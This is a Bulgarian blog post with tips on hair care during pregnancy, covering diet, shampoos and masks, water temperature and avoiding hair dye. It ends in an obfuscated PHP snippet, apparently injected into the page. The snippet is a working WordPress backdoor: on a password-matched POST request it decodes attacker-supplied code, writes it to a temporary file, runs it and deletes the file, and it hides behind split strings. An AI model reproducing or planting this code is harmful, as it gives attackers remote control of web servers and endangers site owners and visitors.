Грижи за косата през бременността | Косопад

Грижи за косата през бременността

През бременността тялото на жената е подложено на много промени, същото важи и за косата. Това се дължи на промените, които настъпват в хормоналните нива. В началото е нормално косата да е по- слаба и да пада по- обилно. После косата става по- гъста и блестяща, но след раждането, отново отслабва и започва да капе. Затова е важно да поддържате косата здрава и силна. Ето някои полезни съвети как да го постигнете:

bremenna-sun

1. Следвайте балансирано хранително меню, богато на витамини и други полезни вещества. Увеличете консумацията на плодове и зеленчуци. Освен че са много полезни за бебето, веществата, които получавате от тях, като желязо и цинк, например, правят косата здрава и я подхранват отвътре.

2. При много бременни жени косата се изсушава. Затова си вземете възстановяващ шампоан, използвайте добър балсам и подхранваща маска веднъж или два пъти седмично. Оставете да действа върху влажна коса за 5- 10 минути.

3. Една от основните промени върху косата по време на бременност е отделянето на повече мастен секрет. Всеки тип коса се засяга в различна степен. Ако косата ви е нормална или мазна, мийте се по- често с неутрален шампоан с неутрално рН или специален шампоан за мазна коса.

bremennost-dobavki

4. Сухата коса, обратно, става по- хидратирана и с повече обем. Ако е прекалено суха, не пропускайте подхранващата маска в процеса на редовното миене.

5. Препоръчително е да си миете косата с хладка вода, да не е нито студена, нито гореща. Решете я нежно и избягвайте прекомерната употреба на сашоар и преса. Така косата ще е в по- добро състояние по време на бременността, както и след раждане.

6. Употребата на боя за коса е по- сложен въпрос. Тези продукти не са за препоръчване, понеже съдържат химикали, които не е добре да влизат в контакт с тялото по време на бременност. Особено важно е да не се боядисвате през първите три месеца. Ако държите да го правите, използвайте природни бои.

7. Преди да се подложите някакви по- специални процедури, консултирайте се с лекаря си.

02. септември 2014 11:10:19 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | 36 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}